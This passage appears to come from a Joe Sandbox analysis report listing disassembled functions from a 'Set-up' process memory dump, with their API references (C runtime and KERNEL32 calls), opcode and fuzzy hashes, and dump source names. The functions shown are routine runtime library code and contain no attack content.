Opcode ID: 4efe297e37bc13d29d08125b521d861b1fd2c10d53b08ec16e1f717bcd60a365
Instruction ID: df4e36d766dc1100b648ffe030cf4859e6f1acf45a184634dd1a42c04c643522
Opcode Fuzzy Hash: 4efe297e37bc13d29d08125b521d861b1fd2c10d53b08ec16e1f717bcd60a365
Instruction Fuzzy Hash: A6118175910248BFCB24EF64C88599D7B78EF44364B1080B5EC669B212DB38DA41CBD0

Function 6BB7933A Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT(?), ref: 6BB7935C

Part of subcall function 6BBB3502: std::exception::_Copy_str.LIBCMT(6BB82171,?,?,6BB82171,6BB81FE2,?,6BB81FE2,00000001), ref: 6BBB351D

_CxxThrowException.MSVCR100(?,6BBDFE78,?), ref: 6BB79371

Part of subcall function 6BB577D4: RaiseException.KERNEL32(?,?,6BB6F317,?,?,?,?,?,6BB6F317,?,6BB4BDD8,6BBE7580), ref: 6BB57813

SignalObjectAndWait.KERNEL32(?,?,000000FF,00000001), ref: 6BB793BA
SetEvent.KERNEL32(?), ref: 6BB793C9

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Exception$Copy_strEventObjectRaiseSignalThrowWaitstd::exception::_std::exception::exception
String ID:
API String ID: 1437111950-0
Opcode ID: 9f8aa1b55ced9298346b61f6e4b35126b2a39064ed3341117fb5d5468bf09aa0
Instruction ID: 207767ee65a311624ee11b33c00af3f1d17886d517ba39a2d35aba18214b99a7
Opcode Fuzzy Hash: 9f8aa1b55ced9298346b61f6e4b35126b2a39064ed3341117fb5d5468bf09aa0
Instruction Fuzzy Hash: 15119335100A45BFCB21EF64C884E8A77B5FF85364B118578E976C7291DB34D905CB50

Function 6BB523EC Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_fileno.MSVCR100(?,?,00000001), ref: 6BB52431
_lseek.MSVCR100(00000000,?,00000001), ref: 6BB52438
_errno.MSVCR100 ref: 6BB68D1F
_ftell_nolock.MSVCR100(?), ref: 6BB68D33

Part of subcall function 6BB4A665: _fileno.MSVCR100(?,?,?,?,?,?,?,6BB4A900,?), ref: 6BB4A694
Part of subcall function 6BB4A665: _write.MSVCR100(00000000,?,?,?,?,?,?,6BB4A900,?), ref: 6BB4A69B

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _fileno$_errno_ftell_nolock_lseek_write
String ID:
API String ID: 2052885585-0
Opcode ID: e23e1c0d1d23114a4bbc024b3759f70314cc6b3292a722d7c69b4346edb33bb2
Instruction ID: 2a3a59a3a2c7e3e06a63ed7ac150fefae6a087c09da087b4ada62346e5f99a56
Opcode Fuzzy Hash: e23e1c0d1d23114a4bbc024b3759f70314cc6b3292a722d7c69b4346edb33bb2
Instruction Fuzzy Hash: FD01C4334007959FDB114E39C801B8E37A4EF06778F14861AEA74561D0E73DE9118B52

Function 6BB80393 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6BB8039A

Part of subcall function 6BB7B4E1: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6BB7B503

??0SchedulerPolicy@Concurrency@@QAA@IZZ.MSVCR100(?,00000000,6BBE4628,0000000C,6BB80342,?,?,?,6BB7617E,?,6BB8558F,00000000,6BB85EC0,?,?,?), ref: 6BB803DD
memcpy.MSVCR100(?,?,00000024,6BBE4628,0000000C,6BB80342,?,?,?,6BB7617E,?,6BB8558F,00000000,6BB85EC0,?,?), ref: 6BB803F8
??3@YAXPAX@Z.MSVCR100(?,?,6BB7617E,?,6BB8558F,00000000,6BB85EC0,?,?,?,00000000,?,?,?,6BB85DCC,00000001), ref: 6BB80422

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency@@Spin$??3@H_prolog3Once@?$_Policy@SchedulerWait@$00@details@memcpy
String ID:
API String ID: 3595554022-0
Opcode ID: 016e861997018063e45cad43303615b94d3b37800d273e8144b2619dfd209b1e
Instruction ID: 1d45b16bf13ae6addeda11287eea998dab9b185d1b078918bc7ce2b985e3992f
Opcode Fuzzy Hash: 016e861997018063e45cad43303615b94d3b37800d273e8144b2619dfd209b1e
Instruction Fuzzy Hash: 10115E30A022919FDF14DFA4CC41B6D73A0AF09399F5400A8E514EB2A1DB7AD941CB94

Function 6BB52214 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

_strlen.LIBCMT(00000000), ref: 6BB52232
_strlen.LIBCMT(00000000), ref: 6BB52241
__fassign.LIBCMT(00000000,00000000,00000000), ref: 6BB5225D
___wtomb_environ.LIBCMT ref: 6BB70817

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _strlen$___wtomb_environ__fassign
String ID:
API String ID: 1283471604-0
Opcode ID: 296978ca2165376d9b4bac98a2f740e2cebc989c2c608c4a75b2901d83a418d8
Instruction ID: 9a120cfce659a7a001a04627d5fe580a0d809fda388b6e03b01926afbe2c38bd
Opcode Fuzzy Hash: 296978ca2165376d9b4bac98a2f740e2cebc989c2c608c4a75b2901d83a418d8
Instruction Fuzzy Hash: E601DD77D0ADD897DB228E68D840F1937E4EF41B94B1544B6EC18E7110DB3BE86286C2

Function 6BB42B2A Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

_msize.MSVCR100(?), ref: 6BB42B59
realloc.MSVCR100(?,?), ref: 6BB42B65
_memset.LIBCMT(00000000,00000000,?), ref: 6BB42B7E
_errno.MSVCR100 ref: 6BB6F352

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_memset_msizerealloc
String ID:
API String ID: 1728161066-0
Opcode ID: 5429b36844b1c51c28563ff91aa890585944cbb2be13d04acb69f0e001fb0dba
Instruction ID: 685c65ed910c95d04bb21d05200e58b20f26b4aba707856fbe7d7ab3b6cacac1
Opcode Fuzzy Hash: 5429b36844b1c51c28563ff91aa890585944cbb2be13d04acb69f0e001fb0dba
Instruction Fuzzy Hash: CEF0F4376142956FDB144D79ECC5D9F7B5AFBC0274B14443EF908C6244EAB88844A590

Function 6BB47F02 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

_calloc_crt.MSVCR100(00000001,00000164), ref: 6BB47F23
InterlockedDecrement.KERNEL32(?), ref: 6BB55B3B
___free_lc_time.LIBCMT ref: 6BB71681
free.MSVCR100(00000000,00000000), ref: 6BB71687

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: DecrementInterlocked___free_lc_time_calloc_crtfree
String ID:
API String ID: 1841316378-0
Opcode ID: 24a8d5f78b2ee7ddacedaf18eadd868ba72048962467d4c9d7eb605199a6735c
Instruction ID: 4a06f561770824005b8fd3515de20211d840f90f9cd51e990cdfb9b081dc1339
Opcode Fuzzy Hash: 24a8d5f78b2ee7ddacedaf18eadd868ba72048962467d4c9d7eb605199a6735c
Instruction Fuzzy Hash: 3D01F9322083D06FD310AA799C8176E77DDE782B69F180029E519E7144DB7EE8019371

Function 6BB53DD5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

_errno.MSVCR100(00000000,00000000), ref: 6BB6AA85
_invalid_parameter_noinfo.MSVCR100(00000000,00000000), ref: 6BB6AA90
_errno.MSVCR100(00000000,00000000,00000000), ref: 6BB6AA99
_invalid_parameter_noinfo.MSVCR100(00000000,00000000,00000000), ref: 6BB6AAA4

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: dadaf8a595f0c1cbaa57641133ffbf19a09de834fc34bf6b7a23a5bd6981d78f
Instruction ID: 0a08433a83e58fd1bc543e5f3271ea5c5bc5aad2a967733b9c7bc3151f059a69
Opcode Fuzzy Hash: dadaf8a595f0c1cbaa57641133ffbf19a09de834fc34bf6b7a23a5bd6981d78f
Instruction Fuzzy Hash: 3711AD319142A99BDF119F34C5447AD7BF0EF41758F1085AAD4229A284EB798A80CED1

Function 6BB80A85 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 6BB80376: TlsGetValue.KERNEL32(6BB76C15,6BB75BAE,?,?,?,6BB75B14,?), ref: 6BB8037C

Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000000,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB80AAB

Part of subcall function 6BB7816F: std::exception::exception.LIBCMT(?,00000000,?,?,6BB80AB0,?,00000000), ref: 6BB78183

_CxxThrowException.MSVCR100(?,6BBDFFD4,?,00000000,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB80AB9

Part of subcall function 6BB577D4: RaiseException.KERNEL32(?,?,6BB6F317,?,?,?,?,?,6BB6F317,?,6BB4BDD8,6BBE7580), ref: 6BB57813

TlsSetValue.KERNEL32(00000000), ref: 6BB80AD4
TlsSetValue.KERNEL32(00000000,?,?,?,?,00000000,?,6BB75C86,00000001), ref: 6BB80AFE

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Value$Exception$Concurrency::unsupported_os::unsupported_osRaiseThrowstd::exception::exception
String ID:
API String ID: 1973407479-0
Opcode ID: 48d0be66e4bd2ad7dcd9c81100d408521819467150602ea784b3245ae910ad6b
Instruction ID: 185dc1c33ab3dfcb594b024ef7df6244da9feb56c1ca50df1ee516be1d1c54cf
Opcode Fuzzy Hash: 48d0be66e4bd2ad7dcd9c81100d408521819467150602ea784b3245ae910ad6b
Instruction Fuzzy Hash: BA01F7315022847FDB22EB79CC41A6EFBB9EF45394F0000A6E45593160DF79E901CB94

Function 6BB7874F Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT(?), ref: 6BB78770

Part of subcall function 6BBB3502: std::exception::_Copy_str.LIBCMT(6BB82171,?,?,6BB82171,6BB81FE2,?,6BB81FE2,00000001), ref: 6BBB351D

_CxxThrowException.MSVCR100(?,6BBDFE98), ref: 6BB78785
TlsGetValue.KERNEL32(?), ref: 6BB78796
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB787AE

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency::unsupported_os::unsupported_osCopy_strExceptionThrowValuestd::exception::_std::exception::exception
String ID:
API String ID: 3937123494-0
Opcode ID: 84676bffdaf45f37a9a909a19364360b749cef22e9a738bfcc7b68772a44a592
Instruction ID: d2a82d4cfab9e02af125b5884176c3686c75f5ec5e7091e25a8c9837d3611265
Opcode Fuzzy Hash: 84676bffdaf45f37a9a909a19364360b749cef22e9a738bfcc7b68772a44a592
Instruction Fuzzy Hash: 6301B17A904184AFC721FF7ADC85C8DBBB8EF4435070081B5E925A7110DB38D505CBA1

Function 6BB87EE6 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6BB87F10
GetLastError.KERNEL32(?,00000000,00000000), ref: 6BB87F1D
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,00000000,00000000), ref: 6BB87F35
_CxxThrowException.MSVCR100(?,6BBDFEB4,00000000,?,00000000,00000000), ref: 6BB87F43

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionLastThrow
String ID:
API String ID: 1394060424-0
Opcode ID: 795e6b06e412ccdf6c24ca8536939dabf1ea74e994f515afdaae76e0c501e7b7
Instruction ID: 71e49db68d8cb9172683562af698e3c2e042e4d7c84e2ff11e2d2bff23e1da8b
Opcode Fuzzy Hash: 795e6b06e412ccdf6c24ca8536939dabf1ea74e994f515afdaae76e0c501e7b7
Instruction Fuzzy Hash: 2C012CB1900745AFD730AF6ACCC596BFAECFB04248B94493DE09AD2541D778E948CB61

Function 6BB77DE5 Relevance: 6.0, APIs: 4, Instructions: 46timeCOMMON

Download Yara Rule

APIs

?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6BB77E0C

Part of subcall function 6BB77406: CreateTimerQueue.KERNEL32(45C8E9F0,?,00000000,45C8E9F0,?,00000000,45C8E9F0,00000000,6BB75CBE,6BB75C86), ref: 6BB7742E
Part of subcall function 6BB77406: std::exception::exception.LIBCMT(6BB75C86,00000001,45C8E9F0,?,00000000,45C8E9F0), ref: 6BB77487
Part of subcall function 6BB77406: _CxxThrowException.MSVCR100(45C8E9F0,6BB4BDD8,6BB75C86,00000001,45C8E9F0,?,00000000,45C8E9F0), ref: 6BB7749C

GetLastError.KERNEL32 ref: 6BB77E19
?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(?,00000000), ref: 6BB77E2B
DeleteTimerQueueTimer.KERNEL32(00000000,?,00000000), ref: 6BB77E31

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Timer$Concurrency@@QueueQueue@details@Shared$CreateDeleteErrorExceptionLastThrowstd::exception::exception
String ID:
API String ID: 3155262267-0
Opcode ID: 36cb003d38f9c22c53c863e713aedb72451d21e3fd64c08898f54d32c7cb6e9a
Instruction ID: 9f8457c3d71445c97510f93ecf36d620473a8c07a04ddd748e4fc2c838db14ad
Opcode Fuzzy Hash: 36cb003d38f9c22c53c863e713aedb72451d21e3fd64c08898f54d32c7cb6e9a
Instruction Fuzzy Hash: E001D172210680ABD7346B26CC85F2B73ACEB41729F100578E97287180DBA9EC058BA2

Function 6BB55B46 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

_strlen.LIBCMT(00000001,?,00000000,00000000,?,6BB8CA68,?,00000000,00000001,6BBE6CD0), ref: 6BB55B5C
malloc.MSVCR100(00000001,00000001,?,00000000,00000000,?,6BB8CA68,?,00000000,00000001,6BBE6CD0), ref: 6BB55B65

Part of subcall function 6BB40233: HeapAlloc.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,6BB40CEA,00000001,00000001,00000001,?,6BB4AB90,00000018,6BB4AA18,0000000C,6BB674F7), ref: 6BB40263

strcpy_s.MSVCR100(00000000,00000001,00000001,?,00000000,00000000,?,6BB8CA68,?,00000000,00000001,6BBE6CD0), ref: 6BB55B77
__invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,00000000,00000001,6BBE6CD0), ref: 6BB69624

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: AllocHeap__invoke_watson_strlenmallocstrcpy_s
String ID:
API String ID: 3151281347-0
Opcode ID: c8c04a039a758b6fc132a3ccb866026cf4f269e290ed2475d41e5d558b47be65
Instruction ID: 4f40e9d6c86a63ee871a93aa9c0d7ccdf38116fb52ab0f9070c5e0c986379c47
Opcode Fuzzy Hash: c8c04a039a758b6fc132a3ccb866026cf4f269e290ed2475d41e5d558b47be65
Instruction Fuzzy Hash: 7DF0A7336081957F97001EB9AC89D8F7B5DEECA6E57114835F70986001EB3DD91191B5

Function 6BB44E90 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

_getptd.MSVCR100(6BB44EF0,0000000C,6BB69FD5,?,?,6BB49233,?), ref: 6BB44E9C
_lock.MSVCR100(0000000C), ref: 6BB44EB3

Part of subcall function 6BB40C43: EnterCriticalSection.KERNEL32(00000001,00000001,?,6BB421A9,0000000D), ref: 6BB40C5E

Part of subcall function 6BB44F0C: _unlock.MSVCR100(0000000C,6BB44EDD), ref: 6BB44F0E

_getptd.MSVCR100 ref: 6BB70771

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _getptd$CriticalEnterSection_lock_unlock
String ID:
API String ID: 2319614578-0
Opcode ID: e2aaaeb420c45ea545ac37e9e8dbb5c231d60a546b4f62d14e35b9f00ea9dd3d
Instruction ID: 0bbdb32be9909fbda4a598ab7f64f36540375c36071b6a1775463945104421b2
Opcode Fuzzy Hash: e2aaaeb420c45ea545ac37e9e8dbb5c231d60a546b4f62d14e35b9f00ea9dd3d
Instruction Fuzzy Hash: 3801F2329492D0EBD724EB788502F1E33A0BF00758F50429AD0246B5A9CF7ECA51EB51

Function 6BB4BBB9 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6BB4BBC0
__AdjustPointer.MSVCR100(00000000,?,00000004,6BB4BCE1,00000000,?,?,?), ref: 6BB4BBEF
__AdjustPointer.MSVCR100(00000000,?,00000001,00000004,6BB4BCE1,00000000,?,?,?), ref: 6BB671EB
memcpy.MSVCR100(?,00000000,00000003,00000004,6BB4BCE1,00000000,?,?,?), ref: 6BB67211

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: AdjustPointer$H_prolog3_catchmemcpy
String ID:
API String ID: 738859832-0
Opcode ID: add57df526903908d416aeef8f0baa1e25e3a03c3b2079a59d61c1a578bdc6e2
Instruction ID: acd856611af2f179b4bcde47f03cada697616023dfd7cee4cc4420a2e8c8146f
Opcode Fuzzy Hash: add57df526903908d416aeef8f0baa1e25e3a03c3b2079a59d61c1a578bdc6e2
Instruction Fuzzy Hash: CE01AD71400284AEEF229F60DC42F9E3B75FF04358F008415FE50180B5DBBAADA0EA50

Function 6BB51201 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(00000000,6BB7085F,?,00000000,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51204
_malloc_crt.MSVCR100(00000002,?,?,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51233
memcpy.MSVCR100(00000000,00000000,00000002,?,?,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB51242
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,?,6BB4FD74,?,6BB4FD98,0000000C), ref: 6BB5124B

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: EnvironmentStrings$Free_malloc_crtmemcpy
String ID:
API String ID: 202606007-0
Opcode ID: c77f32945ab8b3d99a1aa083d681df5fe0bff7025e7ec23df80c66b33da45b9f
Instruction ID: 9f9dd0e771513c0cfee854c0a551cc1690d66fc1d4521d06870974ae0ebfef6a
Opcode Fuzzy Hash: c77f32945ab8b3d99a1aa083d681df5fe0bff7025e7ec23df80c66b33da45b9f
Instruction Fuzzy Hash: 4DF0A77B9059B46ECB307F34BC8589F273CEEC125530E0496F412D3105FA2AC94182A2

Function 6BB81664 Relevance: 6.0, APIs: 4, Instructions: 40COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCR100(?,?,?,6BB81550,?,6BB816DB,?,?,?,6BB81514,?,?,6BB8129E,?,6BB81152,00000002), ref: 6BB81680
_memset.LIBCMT(?,00000000,00000000,?,6BB81550,?,6BB816DB,?,?,?,6BB81514,?,?,6BB8129E,?,6BB81152), ref: 6BB816A1
??3@YAXPAX@Z.MSVCR100(?,?,6BB81550,?,6BB816DB,?,?,?,6BB81514,?,?,6BB8129E,?,6BB81152,00000002,?), ref: 6BB816AC
??3@YAXPAX@Z.MSVCR100(?,?,?,6BB81550,?,6BB816DB,?,?,?,6BB81514,?,?,6BB8129E,?,6BB81152,00000002), ref: 6BB816B2

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ??3@$_memset
String ID:
API String ID: 1722558631-0
Opcode ID: 183182e7c4c582595b499faec1afdc5ad71ddb1a62ef8726871f1a58754acb8a
Instruction ID: 65009121a016bcbf161fa9a6a911bb6c631b7393e0c4e5999a55005a445dfcaf
Opcode Fuzzy Hash: 183182e7c4c582595b499faec1afdc5ad71ddb1a62ef8726871f1a58754acb8a
Instruction Fuzzy Hash: AFF0B4712017519BD3218F29EC81A0BB3E4FF98354B68493CF0E8C7160CB38E982DA14

